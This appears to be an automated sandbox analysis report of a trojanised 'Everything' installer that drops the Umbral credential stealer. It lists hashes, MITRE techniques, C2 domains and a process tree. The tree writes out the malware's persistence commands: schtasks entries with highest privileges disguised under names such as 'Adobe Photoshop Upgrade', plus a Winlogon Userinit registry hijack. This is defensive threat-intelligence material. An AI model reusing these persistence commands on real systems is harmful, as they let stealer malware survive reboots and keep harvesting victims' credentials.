umbral | a15cc13813849501ca47b6e923955a19c34b50934d3701fed5df9763174363f3

Analysis

max time kernel
147s
max time network
141s
platform
windows10-2004_x64
resource
win10v2004-20250410-en
resource tags

arch:x64arch:x86image:win10v2004-20250410-enlocale:en-usos:windows10-2004-x64system
submitted
11/04/2025, 11:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Everything-1.4.1.1026.x64-Setup2.exe
Size

509KB
MD5

875228165176593a7994f3ca25ca8569
SHA1

b83a002a564e40e4c65c9c6f2fd7aa489ccf564f
SHA256

a15cc13813849501ca47b6e923955a19c34b50934d3701fed5df9763174363f3
SHA512

380fb3ee1611aadace6889efc8a9d0326d242f9b9c01deb6a26501ade860c7308e595f1ef1fbf8be774505849e974538742803a585db2b406560a03b09b7fbc4
SSDEEP

6144:MCvXCoHe6VlWT8b9xsBMHybb88CcbloZM+rIkd8g+EtXHkv/iD48HLECl/8e1mop:woHPVle8bLq5oZtL+EP8KFhwG

Score

10^/10

umbral discovery execution persistence privilege_escalation spyware stealer

Malware Config

Signatures

Detect Umbral payload 5 IoCs

resource	yara_rule
behavioral1/files/0x0008000000024295-13.dat	family_umbral
behavioral1/memory/5868-17-0x0000000000400000-0x0000000000487000-memory.dmp	family_umbral
behavioral1/memory/4820-53-0x000001D2AE320000-0x000001D2AE360000-memory.dmp	family_umbral
behavioral1/memory/516-50-0x0000000000400000-0x0000000000482000-memory.dmp	family_umbral
behavioral1/files/0x0007000000024299-44.dat	family_umbral

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\userinit.exe,C:\\Users\\Admin\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\xdwdAudacity.exe"	Client.exe

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3716	powershell.exe
1092	powershell.exe
5760	powershell.exe
3804	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe

Event Triggered Execution: AppInit DLLs 1 TTPs
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.
persistence privilege_escalation

AppInit DLLs
T1546.010

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3027557611-1484967174-339164627-1000\Control Panel\International\Geo\Nation	Everything-1.4.1.1026.x64-Setup2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3027557611-1484967174-339164627-1000\Control Panel\International\Geo\Nation	Result.exe

Executes dropped EXE 5 IoCs

pid	Process
5832	Everything-1.4.1.1026.x64-Setup.exe
516	Result.exe
2664	TimerResolution.exe
4696	Client.exe
4820	Umbral.exe

Loads dropped DLL 46 IoCs

pid	Process
1584	Process not Found
2036	Process not Found
5144	Process not Found
4772	WmiApSrv.exe
5396	Process not Found
5052	Process not Found
5888	Process not Found
3836	Process not Found
2120	Process not Found
2688	Process not Found
4348	Process not Found
5692	Process not Found
5952	Process not Found
3276	Process not Found
5680	Process not Found
800	Process not Found
404	Process not Found
4856	Process not Found
2644	Process not Found
2136	Process not Found
5872	Process not Found
6064	Process not Found
5392	Process not Found
1048	Process not Found
5768	Process not Found
824	Process not Found
4816	Process not Found
4508	Process not Found
3844	Process not Found
1856	Process not Found
2976	Process not Found
4832	Process not Found
5916	Process not Found
5052	Process not Found
2480	Process not Found
1992	Process not Found
5980	Process not Found
2864	Process not Found
464	Process not Found
1048	Process not Found
3616	Process not Found
4852	Process not Found
5132	Process not Found
4484	Process not Found
4464	Process not Found
4492	Process not Found

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
23	discord.com
24	discord.com
26	pastebin.com
27	pastebin.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
11	ip-api.com
35	icanhazip.com

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\xdwd.dll	Client.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Everything-1.4.1.1026.x64-Setup2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Everything-1.4.1.1026.x64-Setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Result.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TimerResolution.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3948	cmd.exe
2948	PING.EXE

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2076	wmic.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2948	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 45 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1964	schtasks.exe
5012	schtasks.exe
1740	schtasks.exe
3688	schtasks.exe
4872	schtasks.exe
1528	schtasks.exe
5644	schtasks.exe
4864	schtasks.exe
5624	schtasks.exe
5540	schtasks.exe
4540	schtasks.exe
3776	schtasks.exe
2272	schtasks.exe
2212	schtasks.exe
2080	schtasks.exe
5448	schtasks.exe
2632	schtasks.exe
1408	schtasks.exe
2656	schtasks.exe
5964	schtasks.exe
464	schtasks.exe
5888	schtasks.exe
5720	schtasks.exe
4524	schtasks.exe
1772	schtasks.exe
2740	schtasks.exe
5960	schtasks.exe
3820	schtasks.exe
2040	schtasks.exe
532	schtasks.exe
3204	schtasks.exe
5196	schtasks.exe
436	schtasks.exe
4000	schtasks.exe
3600	schtasks.exe
3872	schtasks.exe
3304	schtasks.exe
4544	schtasks.exe
4452	schtasks.exe
3452	schtasks.exe
3908	schtasks.exe
5796	schtasks.exe
1904	schtasks.exe
368	schtasks.exe
3292	schtasks.exe

Suspicious behavior: EnumeratesProcesses 39 IoCs

pid	Process
4820	Umbral.exe
3804	powershell.exe
3804	powershell.exe
3716	powershell.exe
3716	powershell.exe
1092	powershell.exe
1092	powershell.exe
464	powershell.exe
464	powershell.exe
5760	powershell.exe
5760	powershell.exe
4696	Client.exe
4696	Client.exe
4696	Client.exe
4696	Client.exe
4696	Client.exe
4696	Client.exe
4696	Client.exe
4696	Client.exe
4696	Client.exe
4696	Client.exe
4696	Client.exe
4696	Client.exe
4696	Client.exe
4696	Client.exe
4696	Client.exe
4696	Client.exe
4696	Client.exe
4696	Client.exe
4696	Client.exe
4696	Client.exe
4696	Client.exe
4696	Client.exe
4696	Client.exe
4696	Client.exe
4696	Client.exe
4696	Client.exe
4772	WmiApSrv.exe
4772	WmiApSrv.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4696	Client.exe
Token: SeDebugPrivilege	4820	Umbral.exe
Token: SeIncreaseQuotaPrivilege	3652	wmic.exe
Token: SeSecurityPrivilege	3652	wmic.exe
Token: SeTakeOwnershipPrivilege	3652	wmic.exe
Token: SeLoadDriverPrivilege	3652	wmic.exe
Token: SeSystemProfilePrivilege	3652	wmic.exe
Token: SeSystemtimePrivilege	3652	wmic.exe
Token: SeProfSingleProcessPrivilege	3652	wmic.exe
Token: SeIncBasePriorityPrivilege	3652	wmic.exe
Token: SeCreatePagefilePrivilege	3652	wmic.exe
Token: SeBackupPrivilege	3652	wmic.exe
Token: SeRestorePrivilege	3652	wmic.exe
Token: SeShutdownPrivilege	3652	wmic.exe
Token: SeDebugPrivilege	3652	wmic.exe
Token: SeSystemEnvironmentPrivilege	3652	wmic.exe
Token: SeRemoteShutdownPrivilege	3652	wmic.exe
Token: SeUndockPrivilege	3652	wmic.exe
Token: SeManageVolumePrivilege	3652	wmic.exe
Token: 33	3652	wmic.exe
Token: 34	3652	wmic.exe
Token: 35	3652	wmic.exe
Token: 36	3652	wmic.exe
Token: SeIncreaseQuotaPrivilege	3652	wmic.exe
Token: SeSecurityPrivilege	3652	wmic.exe
Token: SeTakeOwnershipPrivilege	3652	wmic.exe
Token: SeLoadDriverPrivilege	3652	wmic.exe
Token: SeSystemProfilePrivilege	3652	wmic.exe
Token: SeSystemtimePrivilege	3652	wmic.exe
Token: SeProfSingleProcessPrivilege	3652	wmic.exe
Token: SeIncBasePriorityPrivilege	3652	wmic.exe
Token: SeCreatePagefilePrivilege	3652	wmic.exe
Token: SeBackupPrivilege	3652	wmic.exe
Token: SeRestorePrivilege	3652	wmic.exe
Token: SeShutdownPrivilege	3652	wmic.exe
Token: SeDebugPrivilege	3652	wmic.exe
Token: SeSystemEnvironmentPrivilege	3652	wmic.exe
Token: SeRemoteShutdownPrivilege	3652	wmic.exe
Token: SeUndockPrivilege	3652	wmic.exe
Token: SeManageVolumePrivilege	3652	wmic.exe
Token: 33	3652	wmic.exe
Token: 34	3652	wmic.exe
Token: 35	3652	wmic.exe
Token: 36	3652	wmic.exe
Token: SeDebugPrivilege	3804	powershell.exe
Token: SeDebugPrivilege	3716	powershell.exe
Token: SeDebugPrivilege	1092	powershell.exe
Token: SeDebugPrivilege	464	powershell.exe
Token: SeIncreaseQuotaPrivilege	4132	wmic.exe
Token: SeSecurityPrivilege	4132	wmic.exe
Token: SeTakeOwnershipPrivilege	4132	wmic.exe
Token: SeLoadDriverPrivilege	4132	wmic.exe
Token: SeSystemProfilePrivilege	4132	wmic.exe
Token: SeSystemtimePrivilege	4132	wmic.exe
Token: SeProfSingleProcessPrivilege	4132	wmic.exe
Token: SeIncBasePriorityPrivilege	4132	wmic.exe
Token: SeCreatePagefilePrivilege	4132	wmic.exe
Token: SeBackupPrivilege	4132	wmic.exe
Token: SeRestorePrivilege	4132	wmic.exe
Token: SeShutdownPrivilege	4132	wmic.exe
Token: SeDebugPrivilege	4132	wmic.exe
Token: SeSystemEnvironmentPrivilege	4132	wmic.exe
Token: SeRemoteShutdownPrivilege	4132	wmic.exe
Token: SeUndockPrivilege	4132	wmic.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2664	TimerResolution.exe
2664	TimerResolution.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5868 wrote to memory of 5832	5868	Everything-1.4.1.1026.x64-Setup2.exe	85
PID 5868 wrote to memory of 5832	5868	Everything-1.4.1.1026.x64-Setup2.exe	85
PID 5868 wrote to memory of 5832	5868	Everything-1.4.1.1026.x64-Setup2.exe	85
PID 5868 wrote to memory of 516	5868	Everything-1.4.1.1026.x64-Setup2.exe	86
PID 5868 wrote to memory of 516	5868	Everything-1.4.1.1026.x64-Setup2.exe	86
PID 5868 wrote to memory of 516	5868	Everything-1.4.1.1026.x64-Setup2.exe	86
PID 516 wrote to memory of 2664	516	Result.exe	88
PID 516 wrote to memory of 2664	516	Result.exe	88
PID 516 wrote to memory of 2664	516	Result.exe	88
PID 516 wrote to memory of 4696	516	Result.exe	89
PID 516 wrote to memory of 4696	516	Result.exe	89
PID 516 wrote to memory of 4820	516	Result.exe	90
PID 516 wrote to memory of 4820	516	Result.exe	90
PID 4820 wrote to memory of 3652	4820	Umbral.exe	92
PID 4820 wrote to memory of 3652	4820	Umbral.exe	92
PID 4820 wrote to memory of 4896	4820	Umbral.exe	94
PID 4820 wrote to memory of 4896	4820	Umbral.exe	94
PID 4820 wrote to memory of 3804	4820	Umbral.exe	96
PID 4820 wrote to memory of 3804	4820	Umbral.exe	96
PID 4820 wrote to memory of 3716	4820	Umbral.exe	98
PID 4820 wrote to memory of 3716	4820	Umbral.exe	98
PID 4820 wrote to memory of 1092	4820	Umbral.exe	100
PID 4820 wrote to memory of 1092	4820	Umbral.exe	100
PID 4820 wrote to memory of 464	4820	Umbral.exe	102
PID 4820 wrote to memory of 464	4820	Umbral.exe	102
PID 4820 wrote to memory of 4132	4820	Umbral.exe	104
PID 4820 wrote to memory of 4132	4820	Umbral.exe	104
PID 4820 wrote to memory of 1220	4820	Umbral.exe	106
PID 4820 wrote to memory of 1220	4820	Umbral.exe	106
PID 4820 wrote to memory of 1228	4820	Umbral.exe	108
PID 4820 wrote to memory of 1228	4820	Umbral.exe	108
PID 4820 wrote to memory of 5760	4820	Umbral.exe	110
PID 4820 wrote to memory of 5760	4820	Umbral.exe	110
PID 4820 wrote to memory of 2076	4820	Umbral.exe	112
PID 4820 wrote to memory of 2076	4820	Umbral.exe	112
PID 4820 wrote to memory of 3948	4820	Umbral.exe	114
PID 4820 wrote to memory of 3948	4820	Umbral.exe	114
PID 3948 wrote to memory of 2948	3948	cmd.exe	116
PID 3948 wrote to memory of 2948	3948	cmd.exe	116
PID 4696 wrote to memory of 6132	4696	Client.exe	118
PID 4696 wrote to memory of 6132	4696	Client.exe	118
PID 6132 wrote to memory of 5964	6132	CMD.exe	120
PID 6132 wrote to memory of 5964	6132	CMD.exe	120
PID 4696 wrote to memory of 5676	4696	Client.exe	121
PID 4696 wrote to memory of 5676	4696	Client.exe	121
PID 5676 wrote to memory of 2040	5676	CMD.exe	123
PID 5676 wrote to memory of 2040	5676	CMD.exe	123
PID 4696 wrote to memory of 1540	4696	Client.exe	124
PID 4696 wrote to memory of 1540	4696	Client.exe	124
PID 1540 wrote to memory of 1964	1540	CMD.exe	126
PID 1540 wrote to memory of 1964	1540	CMD.exe	126
PID 4696 wrote to memory of 5868	4696	Client.exe	131
PID 4696 wrote to memory of 5868	4696	Client.exe	131
PID 5868 wrote to memory of 4544	5868	CMD.exe	133
PID 5868 wrote to memory of 4544	5868	CMD.exe	133
PID 4696 wrote to memory of 2636	4696	Client.exe	139
PID 4696 wrote to memory of 2636	4696	Client.exe	139
PID 2636 wrote to memory of 5012	2636	CMD.exe	141
PID 2636 wrote to memory of 5012	2636	CMD.exe	141
PID 4696 wrote to memory of 1780	4696	Client.exe	142
PID 4696 wrote to memory of 1780	4696	Client.exe	142
PID 1780 wrote to memory of 5624	1780	CMD.exe	144
PID 1780 wrote to memory of 5624	1780	CMD.exe	144
PID 4696 wrote to memory of 1368	4696	Client.exe	145

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
4896	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Everything-1.4.1.1026.x64-Setup2.exe
"C:\Users\Admin\AppData\Local\Temp\Everything-1.4.1.1026.x64-Setup2.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5868
- C:\Users\Admin\AppData\Local\Temp\Everything-1.4.1.1026.x64-Setup.exe
  "C:\Users\Admin\AppData\Local\Temp\Everything-1.4.1.1026.x64-Setup.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5832
- C:\Users\Admin\AppData\Local\Temp\Result.exe
  "C:\Users\Admin\AppData\Local\Temp\Result.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:516
- - C:\Users\Admin\AppData\Local\Temp\TimerResolution.exe
    "C:\Users\Admin\AppData\Local\Temp\TimerResolution.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:2664
- - C:\Users\Admin\AppData\Local\Temp\Client.exe
    "C:\Users\Admin\AppData\Local\Temp\Client.exe"
    3⤵
    - Modifies WinLogon for persistence
    - Executes dropped EXE
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4696
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Microsoft Security Essentials" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" & exit
      4⤵
      Suspicious use of WriteProcessMemory
      PID:6132
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Microsoft Security Essentials" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5964
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5676
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2040
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "7-Zip" /tr "C:\Users\Admin\Videos\xdwdMicrosoft Excel.exe" /RL HIGHEST & exit
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1540
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo 5 /tn "7-Zip" /tr "C:\Users\Admin\Videos\xdwdMicrosoft Excel.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1964
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5868
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4544
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2636
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5012
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1780
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5624
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:1368
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4452
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:2848
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3452
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:2656
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:464
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:1096
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2272
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:5096
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2212
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:5368
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3820
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:1684
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3908
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:1544
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5540
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:5484
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4540
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:2704
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3600
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:4964
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:532
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:5844
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3204
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:5424
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5888
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:4012
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2080
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:5212
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5720
